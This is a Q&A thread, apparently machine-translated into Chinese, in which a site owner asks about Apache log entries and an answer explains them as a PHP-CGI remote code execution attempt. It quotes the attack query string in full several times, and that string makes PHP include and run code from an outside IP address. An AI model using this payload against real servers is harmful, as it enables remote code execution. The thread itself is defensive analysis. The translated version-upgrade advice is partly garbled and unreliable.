/index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F61.19.253.26%2Fecho.txt
很多這些是在我的apache日誌中創建一個404,它看起來可能像一個PHP黑客企圖?PHP - 這看起來像一個黑客攻擊嘗試
/index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F61.19.253.26%2Fecho.txt
很多這些是在我的apache日誌中創建一個404,它看起來可能像一個PHP黑客企圖?PHP - 這看起來像一個黑客攻擊嘗試
對我來說,它看起來像一個黑客嘗試。
從PHP Release Announcement page
一些系統支持用於供給串的陣列到CGI腳本的方法。這僅用於「索引」查詢的情況。這通過具有不包含任何未編碼=字符的URL搜索字符串的「GET」或「HEAD」HTTP請求來標識。
的URL解碼查詢字符串看起來是這樣的:
/index.php?-dsafe_mode=Off -ddisable_functions=NULL -dallow_url_fopen=On -dallow_url_include=On -dauto_prepend_file=http://61.19.253.26/echo.txt
這些都是-d
交換機,用於定義php.ini
指令。基本上,這是它的變化:
safe_mode=off
disable_functions=null
allow_url_fopen=on
allow_url_include=on
最後,有auto_prepend_file=http://61.19.253.26/echo.txt
- 這個指令包括位於http://61.19.253.26/echo.txt
PHP代碼和裏面的index.php代碼之前執行它。
echo.txt
託管在泰國某處的網絡服務器上,包含<?php echo "dsfer34w5rlsidfosdedfpsd"; ?>
。這可能用於檢查您的服務器是否容易受到攻擊。
如果你使用Apache mod_cgi
/mod_cgid
之前現在 5.4.3 更新5.3.13和5.4.x版本之前運行PHP版本:http://www.php.net/downloads.php
如何檢查mod_cgi是否正在運行? – user1209203
我認爲這個問題屬於服務器故障。 – FalconC
你解析這些參數嗎? –
這可能是在CGI模式下攻擊PHP的一個不好的嘗試,它不是一個經常遇到的配置。 –